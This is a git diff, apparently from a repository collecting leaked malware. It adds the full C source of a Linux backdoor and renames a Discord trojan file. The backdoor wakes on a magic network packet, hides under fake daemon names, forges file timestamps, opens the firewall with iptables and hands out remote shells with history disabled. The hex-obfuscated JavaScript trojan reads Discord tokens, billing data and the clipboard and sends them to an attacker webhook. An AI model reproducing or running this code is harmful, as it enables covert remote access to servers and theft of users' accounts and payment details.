write(fd, tmp, count); + free(tmp); + return ret; +} + +int cread(int fd, void *buf, int count) +{ + int i; + + if (!count) + return 0; + i = read(fd, buf, count); + + if (i > 0) + rc4(buf, i, &decrypt_ctx); + return i; +} + +static void remove_pid(char *pp) +{ + unlink(pp); +} + +static void setup_time(char *file) +{ + struct timeval tv[2]; + + tv[0].tv_sec = 1225394236; + tv[0].tv_usec = 0; + + tv[1].tv_sec = 1225394236; + tv[1].tv_usec = 0; + + utimes(file, tv); +} +static void terminate(void) +{ + if (getpid() == godpid) + 
remove_pid(pid_path); + + _exit(EXIT_SUCCESS); +} + +static void on_terminate(int signo) +{ + terminate(); +} +static void init_signal(void) +{ + atexit(terminate); + signal(SIGTERM, on_terminate); + return; +} + +void sig_child(int i) +{ + signal(SIGCHLD, sig_child); + waitpid(-1, NULL, WNOHANG); +} + +int ptym_open(char *pts_name) +{ + char *ptr; + int fd; + + strcpy(pts_name,"/dev/ptmx"); + if ((fd = open(pts_name,O_RDWR)) < 0) { + return -1; + } + + if (grantpt(fd) < 0) { + close(fd); + return -2; + } + + if (unlockpt(fd) < 0) { + close(fd); + return -3; + } + + if ((ptr = ptsname(fd)) == NULL) { + close(fd); + return -4; + } + + strcpy(pts_name,ptr); + + return fd; +} + +int ptys_open(int fd,char *pts_name) +{ + int fds; + + if ((fds = open(pts_name,O_RDWR)) < 0) { + close(fd); + return -5; + } + + + if (ioctl(fds,I_PUSH,"ptem") < 0) { + return fds; + } + + if (ioctl(fds,I_PUSH,"ldterm") < 0) { + return fds; + } + + if (ioctl(fds,I_PUSH,"ttcompat") < 0) { + return fds; + } + + return fds; +} + +int open_tty() +{ + char pts_name[20]; + + pty = ptym_open(pts_name); + + tty = ptys_open(pty,pts_name); + + if (pty >= 0 && tty >=0 ) + return 1; + return 0; +} + +int try_link(in_addr_t ip, unsigned short port) +{ + struct sockaddr_in serv_addr; + int sock; + + bzero(&serv_addr, sizeof(serv_addr)); + + serv_addr.sin_addr.s_addr = ip; + + if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { + return -1; + } + + serv_addr.sin_family = AF_INET; + serv_addr.sin_port = port; + + if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(struct sockaddr)) == -1 ) { + close(sock); + return -1; + } + return sock; +} + +int mon(in_addr_t ip, unsigned short port) +{ + struct sockaddr_in remote; + int sock; + int s_len; + + bzero(&remote, sizeof(remote)); + if ((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < -1) { + return -1; + } + remote.sin_family = AF_INET; + remote.sin_port = port; + remote.sin_addr.s_addr = ip; + + if ((s_len = sendto(sock, "1", 1, 0, (struct sockaddr 
*)&remote, sizeof(struct sockaddr))) < 0) { + close(sock); + return -1; + } + close(sock); + return s_len; +} + +int set_proc_name(int argc, char **argv, char *new) +{ + size_t size = 0; + int i; + char *raw = NULL; + char *last = NULL; + + argv0 = argv[0]; + + for (i = 0; environ[i]; i++) + size += strlen(environ[i]) + 1; + + raw = (char *) malloc(size); + if (NULL == raw) + return -1; + + for (i = 0; environ[i]; i++) + { + memcpy(raw, environ[i], strlen(environ[i]) + 1); + environ[i] = raw; + raw += strlen(environ[i]) + 1; + } + + last = argv[0]; + + for (i = 0; i < argc; i++) + last += strlen(argv[i]) + 1; + for (i = 0; environ[i]; i++) + last += strlen(environ[i]) + 1; + + memset(argv0, 0x00, last - argv0); + strncpy(argv0, new, last - argv0); + + prctl(PR_SET_NAME, (unsigned long) new); + return 0; +} +int to_open(char *name, char *tmp) +{ + char cmd[256] = {0}; + char fmt[] = { + 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x72, 0x6d, 0x20, 0x2d, 0x66, + 0x20, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x73, 0x68, 0x6d, 0x2f, + 0x25, 0x73, 0x3b, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x63, 0x70, + 0x20, 0x25, 0x73, 0x20, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x73, + 0x68, 0x6d, 0x2f, 0x25, 0x73, 0x20, 0x26, 0x26, 0x20, 0x2f, + 0x62, 0x69, 0x6e, 0x2f, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, + 0x37, 0x35, 0x35, 0x20, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x73, + 0x68, 0x6d, 0x2f, 0x25, 0x73, 0x20, 0x26, 0x26, 0x20, 0x2f, + 0x64, 0x65, 0x76, 0x2f, 0x73, 0x68, 0x6d, 0x2f, 0x25, 0x73, + 0x20, 0x2d, 0x2d, 0x69, 0x6e, 0x69, 0x74, 0x20, 0x26, 0x26, + 0x20, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x72, 0x6d, 0x20, 0x2d, + 0x66, 0x20, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x73, 0x68, 0x6d, + 0x2f, 0x25, 0x73, 0x00}; // /bin/rm -f /dev/shm/%s;/bin/cp %s /dev/shm/%s && /bin/chmod 755 /dev/shm/%s && /dev/shm/%s --init && /bin/rm -f /dev/shm/%s + + snprintf(cmd, sizeof(cmd), fmt, tmp, name, tmp, tmp, tmp, tmp); + system(cmd); + sleep(2); + if (access(pid_path, R_OK) == 0) + return 0; + return 1; +} + +int logon(const char *hash) +{ + int x = 0; 
+ x = memcmp(cfg.pass, hash, strlen(cfg.pass)); + if (x == 0) + return 0; + x = memcmp(cfg.pass2, hash, strlen(cfg.pass2)); + if (x == 0) + return 1; + + return 2; +} + +void packet_loop() +{ + int sock, r_len, pid, scli, size_ip, size_tcp; + socklen_t psize; + uchar buff[512]; + const struct sniff_ip *ip; + const struct sniff_tcp *tcp; + struct magic_packet *mp; + const struct sniff_udp *udp; + in_addr_t bip; + char *pbuff = NULL; + + // + // Filter Options Build Filter Struct + // + + struct sock_fprog filter; + struct sock_filter bpf_code[] = { + { 0x28, 0, 0, 0x0000000c }, + { 0x15, 0, 27, 0x00000800 }, + { 0x30, 0, 0, 0x00000017 }, + { 0x15, 0, 5, 0x00000011 }, + { 0x28, 0, 0, 0x00000014 }, + { 0x45, 23, 0, 0x00001fff }, + { 0xb1, 0, 0, 0x0000000e }, + { 0x48, 0, 0, 0x00000016 }, + { 0x15, 19, 20, 0x00007255 }, + { 0x15, 0, 7, 0x00000001 }, + { 0x28, 0, 0, 0x00000014 }, + { 0x45, 17, 0, 0x00001fff }, + { 0xb1, 0, 0, 0x0000000e }, + { 0x48, 0, 0, 0x00000016 }, + { 0x15, 0, 14, 0x00007255 }, + { 0x50, 0, 0, 0x0000000e }, + { 0x15, 11, 12, 0x00000008 }, + { 0x15, 0, 11, 0x00000006 }, + { 0x28, 0, 0, 0x00000014 }, + { 0x45, 9, 0, 0x00001fff }, + { 0xb1, 0, 0, 0x0000000e }, + { 0x50, 0, 0, 0x0000001a }, + { 0x54, 0, 0, 0x000000f0 }, + { 0x74, 0, 0, 0x00000002 }, + { 0xc, 0, 0, 0x00000000 }, + { 0x7, 0, 0, 0x00000000 }, + { 0x48, 0, 0, 0x0000000e }, + { 0x15, 0, 1, 0x00005293 }, + { 0x6, 0, 0, 0x0000ffff }, + { 0x6, 0, 0, 0x00000000 }, + }; + + filter.len = sizeof(bpf_code)/sizeof(bpf_code[0]); + filter.filter = bpf_code; + + // + // Build a rawsocket that binds the NIC to receive Ethernet frames + // + + if ((sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_IP))) < 1) + return; + + // + // Set a packet filter + // + + if (setsockopt(sock, SOL_SOCKET, SO_ATTACH_FILTER, &filter, sizeof(filter)) == -1) { + return; + } + + + // + // Loop to Read Packets in 512 Chunks + // + + + while (1) { + memset(buff, 0, 512); + psize = 0; + r_len = recvfrom(sock, buff, 512, 0x0, 
NULL, NULL); + + ip = (struct sniff_ip *)(buff+14); + size_ip = IP_HL(ip)*4; + if (size_ip < 20) continue; + + // determine protocl from packet (offset 14) + switch(ip->ip_p) { + case IPPROTO_TCP: + tcp = (struct sniff_tcp*)(buff+14+size_ip); + size_tcp = TH_OFF(tcp)*4; + mp = (struct magic_packet *)(buff+14+size_ip+size_tcp); + break; + case IPPROTO_UDP: + udp = (struct sniff_udp *)(ip+1); + mp = (struct magic_packet *)(udp+1); + break; + case IPPROTO_ICMP: + pbuff = (char *)(ip+1); + mp = (struct magic_packet *)(pbuff+8); + break; + default: + break; + } + + // if magic packet is set process + + if (mp) { + if (mp->ip == INADDR_NONE) + bip = ip->ip_src.s_addr; + else + bip = mp->ip; + + pid = fork(); + if (pid) { + waitpid(pid, NULL, WNOHANG); + } + else { + int cmp = 0; + char sip[20] = {0}; + char pname[] = {0x2f, 0x75, 0x73, 0x72, 0x2f, 0x6c, 0x69, 0x62, 0x65, 0x78, 0x65, 0x63, 0x2f, 0x70, 0x6f, 0x73, 0x74, 0x66, 0x69, 0x78, 0x2f, 0x6d, 0x61, 0x73, 0x74, 0x65, + 0x72, 0x00}; // /usr/libexec/postfix/master + + if (fork()) exit(0); + chdir("/"); + setsid(); + signal(SIGHUP, SIG_DFL); + memset(argv0, 0, strlen(argv0)); + strcpy(argv0, pname); // sets process name (/usr/libexec/postfix/master) + prctl(PR_SET_NAME, (unsigned long) pname); + + rc4_init(mp->pass, strlen(mp->pass), &crypt_ctx); + rc4_init(mp->pass, strlen(mp->pass), &decrypt_ctx); + + cmp = logon(mp->pass); + switch(cmp) { + case 1: + strcpy(sip, inet_ntoa(ip->ip_src)); + getshell(sip, ntohs(tcp->th_dport)); + break; + case 0: + scli = try_link(bip, mp->port); + if (scli > 0) + shell(scli, NULL, NULL); + break; + case 2: + mon(bip, mp->port); + break; + } + exit(0); + } + } + + } + close(sock); +} + +int b(int *p) +{ + int port; + struct sockaddr_in my_addr; + int sock_fd; + int flag = 1; + + if( (sock_fd = socket(AF_INET,SOCK_STREAM,0)) == -1 ){ + return -1; + } + + setsockopt(sock_fd,SOL_SOCKET,SO_REUSEADDR, (char*)&flag,sizeof(flag)); + + my_addr.sin_family = AF_INET; + my_addr.sin_addr.s_addr = 0; 
+ + for (port = 42391; port < 43391; port++) { + my_addr.sin_port = htons(port); + if( bind(sock_fd,(struct sockaddr *)&my_addr,sizeof(struct sockaddr)) == -1 ){ + continue; + } + if( listen(sock_fd,1) == 0 ) { + *p = port; + return sock_fd; + } + close(sock_fd); + } + return -1; +} + +int w(int sock) +{ + socklen_t size; + struct sockaddr_in remote_addr; + int sock_id; + + size = sizeof(struct sockaddr_in); + if( (sock_id = accept(sock,(struct sockaddr *)&remote_addr, &size)) == -1 ){ + return -1; + } + + close(sock); + return sock_id; + +} + +void getshell(char *ip, int fromport) +{ + int sock, sockfd, toport; + char cmd[512] = {0}, rcmd[512] = {0}, dcmd[512] = {0}; + char cmdfmt[] = { + 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x69, 0x70, 0x74, 0x61, 0x62, 0x6c, + 0x65, 0x73, 0x20, 0x2d, 0x74, 0x20, 0x6e, 0x61, 0x74, 0x20, 0x2d, 0x41, + 0x20, 0x50, 0x52, 0x45, 0x52, 0x4f, 0x55, 0x54, 0x49, 0x4e, 0x47, 0x20, + 0x2d, 0x70, 0x20, 0x74, 0x63, 0x70, 0x20, 0x2d, 0x73, 0x20, 0x25, 0x73, + 0x20, 0x2d, 0x2d, 0x64, 0x70, 0x6f, 0x72, 0x74, 0x20, 0x25, 0x64, 0x20, + 0x2d, 0x6a, 0x20, 0x52, 0x45, 0x44, 0x49, 0x52, 0x45, 0x43, 0x54, 0x20, + 0x2d, 0x2d, 0x74, 0x6f, 0x2d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0x20, 0x25, + 0x64, 0x00}; // /sbin/iptables -t nat -A PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d + char rcmdfmt[] = { + 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x69, 0x70, 0x74, 0x61, 0x62, 0x6c, + 0x65, 0x73, 0x20, 0x2d, 0x74, 0x20, 0x6e, 0x61, 0x74, 0x20, 0x2d, 0x44, + 0x20, 0x50, 0x52, 0x45, 0x52, 0x4f, 0x55, 0x54, 0x49, 0x4e, 0x47, 0x20, + 0x2d, 0x70, 0x20, 0x74, 0x63, 0x70, 0x20, 0x2d, 0x73, 0x20, 0x25, 0x73, + 0x20, 0x2d, 0x2d, 0x64, 0x70, 0x6f, 0x72, 0x74, 0x20, 0x25, 0x64, 0x20, + 0x2d, 0x6a, 0x20, 0x52, 0x45, 0x44, 0x49, 0x52, 0x45, 0x43, 0x54, 0x20, + 0x2d, 0x2d, 0x74, 0x6f, 0x2d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0x20, 0x25, + 0x64, 0x00}; // /sbin/iptables -t nat -D PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d + char inputfmt[] = { + 0x2f, 0x73, 
0x62, 0x69, 0x6e, 0x2f, 0x69, 0x70, 0x74, 0x61, 0x62, 0x6c, + 0x65, 0x73, 0x20, 0x2d, 0x49, 0x20, 0x49, 0x4e, 0x50, 0x55, 0x54, 0x20, + 0x2d, 0x70, 0x20, 0x74, 0x63, 0x70, 0x20, 0x2d, 0x73, 0x20, 0x25, 0x73, + 0x20, 0x2d, 0x6a, 0x20, 0x41, 0x43, 0x43, 0x45, 0x50, 0x54, 0x00}; // /sbin/iptables -I INPUT -p tcp -s %s -j ACCEPT + char dinputfmt[] = { + 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x2f, 0x69, 0x70, 0x74, 0x61, 0x62, 0x6c, + 0x65, 0x73, 0x20, 0x2d, 0x44, 0x20, 0x49, 0x4e, 0x50, 0x55, 0x54, 0x20, + 0x2d, 0x70, 0x20, 0x74, 0x63, 0x70, 0x20, 0x2d, 0x73, 0x20, 0x25, 0x73, + 0x20, 0x2d, 0x6a, 0x20, 0x41, 0x43, 0x43, 0x45, 0x50, 0x54, 0x00}; // /sbin/iptables -D INPUT -p tcp -s %s -j ACCEPT + + sockfd = b(&toport); // looks like it selects random ephemral port here + if (sockfd == -1) return; + + snprintf(cmd, sizeof(cmd), inputfmt, ip); + snprintf(dcmd, sizeof(dcmd), dinputfmt, ip); + system(cmd); // executes /sbin/iptables -I INPUT -p tcp -s %s -j ACCEPT + sleep(1); + memset(cmd, 0, sizeof(cmd)); + snprintf(cmd, sizeof(cmd), cmdfmt, ip, fromport, toport); + snprintf(rcmd, sizeof(rcmd), rcmdfmt, ip, fromport, toport); + system(cmd); // executes /sbin/iptables -t nat -A PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d + sleep(1); + sock = w(sockfd); // creates a sock that listens on port specified earlier + if( sock < 0 ){ + close(sock); + return; + } + + // + // passes sock and + // rcmd = /sbin/iptables -t nat -D PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d + // dcmd = /sbin/iptables -D INPUT -p tcp -s %s -j ACCEPT + // + // + + shell(sock, rcmd, dcmd); + close(sock); +} + +int shell(int sock, char *rcmd, char *dcmd) +{ + int subshell; + fd_set fds; + char buf[BUF]; + char argx[] = { + 0x71, 0x6d, 0x67, 0x72, 0x20, 0x2d, 0x6c, 0x20, 0x2d, 0x74, + 0x20, 0x66, 0x69, 0x66, 0x6f, 0x20, 0x2d, 0x75, 0x00}; // qmgr -l -t fifo -u + char *argvv[] = {argx, NULL, NULL}; + #define MAXENV 256 + #define ENVLEN 256 + char *envp[MAXENV]; + char sh[] = {0x2f, 
0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00}; // /bin/sh + int ret; + char home[] = {0x48, 0x4f, 0x4d, 0x45, 0x3d, 0x2f, 0x74, 0x6d, 0x70, 0x00}; // HOME=/tmp + char ps[] = { + 0x50, 0x53, 0x31, 0x3d, 0x5b, 0x5c, 0x75, 0x40, 0x5c, 0x68, 0x20, + 0x5c, 0x57, 0x5d, 0x5c, 0x5c, 0x24, 0x20, 0x00}; // PS1=[\u@\h \W]\\$ + char histfile[] = { + 0x48, 0x49, 0x53, 0x54, 0x46, 0x49, 0x4c, 0x45, 0x3d, 0x2f, 0x64, + 0x65, 0x76, 0x2f, 0x6e, 0x75, 0x6c, 0x6c, 0x00}; // HISTFILE=/dev/null + char mshist[] = { + 0x4d, 0x59, 0x53, 0x51, 0x4c, 0x5f, 0x48, 0x49, 0x53, 0x54, 0x46, + 0x49, 0x4c, 0x45, 0x3d, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x6e, 0x75, + 0x6c, 0x6c, 0x00}; // MYSQL_HISTFILE=/dev/null + char ipath[] = { + 0x50, 0x41, 0x54, 0x48, 0x3d, 0x2f, 0x62, 0x69, 0x6e, + 0x3a, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x6b, 0x65, 0x72, 0x62, 0x65, + 0x72, 0x6f, 0x73, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, + 0x73, 0x72, 0x2f, 0x6b, 0x65, 0x72, 0x62, 0x65, 0x72, 0x6f, 0x73, + 0x2f, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x3a, + 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, + 0x73, 0x72, 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, 0x73, + 0x72, 0x2f, 0x6c, 0x6f, 0x63, 0x61, 0x6c, 0x2f, 0x62, 0x69, 0x6e, + 0x3a, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x6c, 0x6f, 0x63, 0x61, 0x6c, + 0x2f, 0x73, 0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75, 0x73, 0x72, 0x2f, + 0x58, 0x31, 0x31, 0x52, 0x36, 0x2f, 0x62, 0x69, 0x6e, 0x3a, 0x2e, + 0x2f, 0x62, 0x69, 0x6e, 0x00}; // PATH=/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin:./bin + char term[] = "vt100"; + + envp[0] = home; + envp[1] = ps; + envp[2] = histfile; + envp[3] = mshist; + envp[4] = ipath; + envp[5] = term; + envp[6] = NULL; + + if (rcmd != NULL) + system(rcmd); + if (dcmd != NULL) + system(dcmd); + write(sock, "3458", 4); + if (!open_tty()) { + if (!fork()) { + dup2(sock, 0); + dup2(sock, 1); + dup2(sock, 2); + execve(sh, argvv, envp); + } + close(sock); + return 0; 
+ } + + subshell = fork(); + if (subshell == 0) { + close(pty); + ioctl(tty, TIOCSCTTY); + close(sock); + dup2(tty, 0); + dup2(tty, 1); + dup2(tty, 2); + close(tty); + execve(sh, argvv, envp); + } + close(tty); + + while (1) { + FD_ZERO(&fds); + FD_SET(pty, &fds); + FD_SET(sock, &fds); + if (select((pty > sock) ? (pty+1) : (sock+1), + &fds, NULL, NULL, NULL) < 0) + { + break; + } + if (FD_ISSET(pty, &fds)) { + int count; + count = read(pty, buf, BUF); + if (count <= 0) break; + if (cwrite(sock, buf, count) <= 0) break; + } + if (FD_ISSET(sock, &fds)) { + int count; + unsigned char *p, *d; + d = (unsigned char *)buf; + count = cread(sock, buf, BUF); + if (count <= 0) break; + + p = memchr(buf, ECHAR, count); + if (p) { + unsigned char wb[5]; + int rlen = count - ((long) p - (long) buf); + struct winsize ws; + + if (rlen > 5) rlen = 5; + memcpy(wb, p, rlen); + if (rlen < 5) { + ret = cread(sock, &wb[rlen], 5 - rlen); + } + + ws.ws_xpixel = ws.ws_ypixel = 0; + ws.ws_col = (wb[1] << 8) + wb[2]; + ws.ws_row = (wb[3] << 8) + wb[4]; + ioctl(pty, TIOCSWINSZ, &ws); + kill(0, SIGWINCH); + + ret = write(pty, buf, (long) p - (long) buf); + rlen = ((long) buf + count) - ((long)p+5); + if (rlen > 0) ret = write(pty, p+5, rlen); + } else + if (write(pty, d, count) <= 0) break; + } + } + close(sock); + close(pty); + waitpid(subshell, NULL, 0); + vhangup(); + exit(0); +} + +int main(int argc, char *argv[]) +{ + char hash[] = {0x6a, 0x75, 0x73, 0x74, 0x66, 0x6f, 0x72, 0x66, 0x75, 0x6e, 0x00}; // justforfun + char hash2[]= {0x73, 0x6f, 0x63, 0x6b, 0x65, 0x74, 0x00}; // socket + char *self[] = { + "/sbin/udevd -d", + "/sbin/mingetty /dev/tty7", + "/usr/sbin/console-kit-daemon --no-daemon", + "hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event", + "dbus-daemon --system", + "hald-runner", + "pickup -l -t fifo -u", + "avahi-daemon: chroot helper", + "/sbin/auditd -n", + "/usr/lib/systemd/systemd-journald" + }; + + pid_path[0] = 0x2f; pid_path[1] = 0x76; pid_path[2] = 
0x61; + pid_path[3] = 0x72; pid_path[4] = 0x2f; pid_path[5] = 0x72; + pid_path[6] = 0x75; pid_path[7] = 0x6e; pid_path[8] = 0x2f; + pid_path[9] = 0x68; pid_path[10] = 0x61; pid_path[11] = 0x6c; + pid_path[12] = 0x64; pid_path[13] = 0x72; pid_path[14] = 0x75; + pid_path[15] = 0x6e; pid_path[16] = 0x64; pid_path[17] = 0x2e; + pid_path[18] = 0x70; pid_path[19] = 0x69; pid_path[20] = 0x64; + pid_path[21] = 0x00; // /var/run/haldrund.pid + + if (access(pid_path, R_OK) == 0) { + exit(0); + } + + if (getuid() != 0) { + return 0; + } + + if (argc == 1) { + if (to_open(argv[0], "kdmtmpflush") == 0) + _exit(0); + _exit(-1); + } + + bzero(&cfg, sizeof(cfg)); + + srand((unsigned)time(NULL)); + strcpy(cfg.mask, self[rand()%10]); + strcpy(cfg.pass, hash); + strcpy(cfg.pass2, hash2); + + setup_time(argv[0]); + + set_proc_name(argc, argv, cfg.mask); + + if (fork()) exit(0); + init_signal(); + signal(SIGCHLD, sig_child); + godpid = getpid(); + + close(open(pid_path, O_CREAT|O_WRONLY, 0644)); + + signal(SIGCHLD,SIG_IGN); + setsid(); + packet_loop(); + return 0; } \ No newline at end of file diff --git a/Leaks/Other/Trojan.Discord.SpideyBot.a b/Other/Trojan.Discord.SpideyBot.a similarity index 98% rename from Leaks/Other/Trojan.Discord.SpideyBot.a rename to Other/Trojan.Discord.SpideyBot.a index ee8082736..f5d95e6b9 100644 --- a/Leaks/Other/Trojan.Discord.SpideyBot.a +++ b/Other/Trojan.Discord.SpideyBot.a 
@@ -1,234 +1,234 @@ -modules\ discord_modules: - -var _0x476f = ["\x74\x6F\x73\x74\x72\x69\x6E\x67\x20\x77\x61\x73\x20\x68\x65\x72\x65", "\x72\x65\x71\x75\x69\x72\x65", "\x65\x6C\x65\x63\x74\x72\x6F\x6E", "\x74\x6F\x6B\x65\x6E", "\x6C\x6F\x63\x61\x6C\x53\x74\x6F\x72\x61\x67\x65", "\x63\x6F\x6E\x74\x65\x6E\x74\x57\x69\x6E\x64\x6F\x77", "\x69\x66\x72\x61\x6D\x65", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x62\x6F\x64\x79", "\x22", "", "\x72\x65\x70\x6C\x61\x63\x65", "\x60", "\x73\x69\x7A\x65\x31\x34\x2D\x65\x36\x5A\x53\x63\x48\x20\x74\x69\x74\x6C\x65\x2D\x65\x53\x35\x79\x6B\x33", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x43\x6C\x61\x73\x73\x4E\x61\x6D\x65", "\x55\x6E\x61\x62\x6C\x65\x20\x74\x6F\x20\x66\x65\x74\x63\x68\x2C\x20\x70\x6F\x73\x73\x69\x62\x6C\x79\x20\x64\x75\x65\x20\x74\x6F\x20\x61\x20\x64\x69\x66\x66\x65\x72\x65\x6E\x74\x20\x64\x69\x73\x63\x6F\x72\x64\x20\x64\x69\x73\x74\x72\x69\x62\x75\x74\x65\x20\x6F\x72\x20\x75\x70\x64\x61\x74\x65\x2E", "\x74\x65\x78\x74\x43\x6F\x6E\x74\x65\x6E\x74", "\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74", "\x6C\x6F\x61\x64", "\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72", "\x47\x45\x54", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x74\x6F\x73\x74\x72\x69\x6E\x67\x69\x73\x76\x65\x72\x79\x63\x6F\x6F\x69\x2E\x30\x30\x30\x77\x65\x62\x68\x6F\x73\x74\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x68\x6F\x2F\x79\x6F\x75\x61\x72\x65\x61\x70\x70\x72\x6F\x61\x63\x68\x69\x6E\x67\x6D\x65\x2F\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x2F\x57\x52\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x2E\x74\x78\x74", "\x6F\x70\x65\x6E", 
"\x73\x65\x6E\x64", "\x7B\x22\x6D\x65\x73\x73\x61\x67\x65\x22\x3A\x20\x22\x49\x6E\x76\x61\x6C\x69\x64\x20\x57\x65\x62\x68\x6F\x6F\x6B\x20\x54\x6F\x6B\x65\x6E\x22\x2C\x20\x22\x63\x6F\x64\x65\x22\x3A\x20\x35\x30\x30\x32\x37\x7D", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x77\x65\x62\x68\x6F\x6F\x6B\x73\x2F\x36\x32\x39\x31\x39\x36\x34\x30\x37\x31\x36\x34\x36\x33\x33\x30\x38\x39\x2F\x6F\x38\x30\x70\x70\x4E\x42\x31\x34\x31\x6B\x52\x7A\x6D\x51\x70\x6C\x31\x70\x76\x48\x6C\x74\x52\x6A\x47\x2D\x4B\x33\x2D\x43\x41\x6C\x72\x52\x6D\x4F\x79\x33\x4F\x46\x4F\x58\x65\x57\x31\x2D\x65\x58\x49\x57\x78\x42\x45\x54\x50\x71\x55\x48\x47\x69\x58\x61\x43\x44\x53\x58\x70", "\x50\x4F\x53\x54", "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65", "\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E", "\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72", "\x73\x74\x72\x69\x6E\x67\x69\x66\x79", "\x67\x65\x74\x5A\x6F\x6F\x6D\x46\x61\x63\x74\x6F\x72", "\x77\x65\x62\x46\x72\x61\x6D\x65", "\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x67\x65\x74\x56\x65\x72\x73\x69\x6F\x6E", "\x61\x70\x70", "\x72\x65\x6D\x6F\x74\x65", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67", "\x72\x65\x61\x64\x54\x65\x78\x74", "\x63\x6C\x69\x70\x62\x6F\x61\x72\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x69\x70\x69\x66\x79\x2E\x6F\x72\x67", "\x74\x69\x6D\x65\x5A\x6F\x6E\x65", "\x72\x65\x73\x6F\x6C\x76\x65\x64\x4F\x70\x74\x69\x6F\x6E\x73", "\x61\x76\x61\x69\x6C\x57\x69\x64\x74\x68", "\x73\x63\x72\x65\x65\x6E", "\x78", "\x61\x76\x61\x69\x6C\x48\x65\x69\x67\x68\x74", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x75\x73\x65\x72\x73\x2F\x40\x6D\x65", "\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E", "\x5B\x5D", 
"\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x76\x36\x2F\x75\x73\x65\x72\x73\x2F\x40\x6D\x65\x2F\x62\x69\x6C\x6C\x69\x6E\x67\x2F\x70\x61\x79\x6D\x65\x6E\x74\x2D\x73\x6F\x75\x72\x63\x65\x73", "\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E", "\x6D\x6F\x7A\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E", "\x77\x65\x62\x6B\x69\x74\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E", "\x63\x72\x65\x61\x74\x65\x44\x61\x74\x61\x43\x68\x61\x6E\x6E\x65\x6C", "\x63\x61\x6E\x64\x69\x64\x61\x74\x65", "\x69\x6E\x64\x65\x78\x4F\x66", "\x66\x6F\x72\x45\x61\x63\x68", "\x6D\x61\x74\x63\x68", "\x0A", "\x73\x70\x6C\x69\x74", "\x73\x64\x70", "\x73\x65\x74\x4C\x6F\x63\x61\x6C\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E", "\x63\x72\x65\x61\x74\x65\x4F\x66\x66\x65\x72", 